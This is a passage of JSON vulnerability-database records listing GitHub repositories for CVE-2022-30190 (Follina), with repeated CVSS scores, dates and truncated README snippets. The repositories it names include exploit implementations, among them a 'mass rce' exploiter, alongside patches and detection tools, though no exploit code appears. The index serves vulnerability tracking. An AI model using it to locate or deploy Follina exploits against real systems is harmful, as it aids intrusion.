"baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T18:58:07", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T08:02:05", "id": "5E983FEF-4BE8-5A69-BABE-3CFFC983F1B5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T18:58:22", "description": "# CVE-2022-30190\n\n> Based on https://github.com/JohnHammond/msdt...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-02T07:56:28", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:29", "id": "CEC4033D-26C5-5A07-8D86-31A7AF928BDB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:37:57", "description": "# Follina - CVE-2022-30190\n\nFollina is a zero day allowing code ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T15:39:20", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-02T00:23:18", "id": "8516D742-8A1C-521C-8372-26BA9FBA2200", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:39:33", "description": "# CVE-2022-30190-Follina-Patch\nThis is a simple program allows y...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T13:43:20", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-01T22:07:49", "id": "A4440EF1-5891-5FCD-BA92-DD2B6E54C7F0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:17:52", "description": "# Five Nights at Follina's\nA Fullstack Academy Cybersecurity pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-01T16:47:50", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T16:10:38", "id": "633FDFCF-0DF4-5FE6-B5DF-85F847D6D31E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:35:03", "description": "# CVE-2022-30190 - Microsoft Support Diagnostic Tool\n\n## About\n\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T10:07:52", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:39:30", "id": "F8ECE1BA-CC33-5566-B57C-1AB243A48E28", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:31:38", "description": "# **_\ud83e\ude79CVE-2022-30190 Temporary Fix\ud83e\ude79 (Source Code)_**\nThese are t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-12T11:48:22", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:20:20", "id": "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:13:25", "description": "# CVE-2022-30190 (Follina)\n\n[![build.yml](https://github.com/win...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-15T16:12:57", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-08-29T16:29:42", "id": "7FAB36AD-345E-5C1B-B259-20BF0E7DE97A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-02T22:59:27", "description": "# CVE-2022-30190-mass-rce\nCVE-2022-30190 Zero click rce Mass Exp...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T17:28:27", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T17:31:11", "id": "75389328-1B05-5056-B8C0-C624BF0343AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:32:17", "description": "# follina-CVE-2022-30190\nfollina zer...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T22:49:21", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-16T00:04:19", "id": "6AF23F99-AE40-5899-AD81-AE3F71760F38", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T18:55:23", "description": "# CVE 30190\n\n> Amine TITROFINE | December 17, 2022\n\n------------...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-14T13:38:43", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-10-26T20:33:52", "id": "3CCF78E3-E22A-54A3-907C-1D687E20BE7C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-06T09:05:39", "description": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <meta htt...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-26T10:29:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:23", "id": "85BF1C0C-52A1-5413-8D04-253B6AC0B7CA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T18:17:43", "description": "# FOLLINA-CVE-2022-30190\nImplementation of FOLLINA-CVE-2022-3019...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-03-14T07:00:47", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:35", "id": "6E70CDA8-57F7-5737-80B5-84D8D2254D9D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:36:07", "description": "# Deathnote\n<p align=\"center\">\n \n<img src=\"https://media3.giphy....", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T10:58:23", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-10-04T04:40:27", "id": "70407390-C149-54F1-89B0-7611FB420601", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:34:11", "description": "# Compromised clickstudio certificate\n\n__Extracted from__: f3ccf...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T10:03:06", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T10:06:44", "id": "1E1DD2F1-F609-5686-A0EF-1C08ACABF537", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:39:17", "description": "# cve-2022-30190\nCVE-2022-30190 remediation via removal of ms-ms...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T23:32:33", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:39:18", "id": "71065DAD-91FD-5CFB-9F35-CA3E1837FF2C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:38:02", "description": "# MS-MSDT-Office-RCE-Follina\nCVE-2022-30190 | MS-MSDT Follina On...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T16:09:02", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:39:22", "id": "FCCAAA4B-646B-578D-8CE2-5439E7799C32", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:21:48", "description": "# Follina-MSDT-Vulnerability-CVE-2022-30190-\nDetection and Remed...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-21T06:49:44", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-20T14:40:32", "id": "E51E8D61-BAA6-5098-9EEE-50DD18427F87", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:32:10", "description": "# Follina-CVE-2022-30190-Unofficial-patch-\nAn Unofficial Patch F...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-13T04:20:02", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:39:41", "id": "5B74BEF9-0D39-5A60-8806-ABA55730878C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:28:42", "description": "# CVE-2022-30190_EXP_PowerPoint\n\nThis is exploit of CVE-2022-301...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 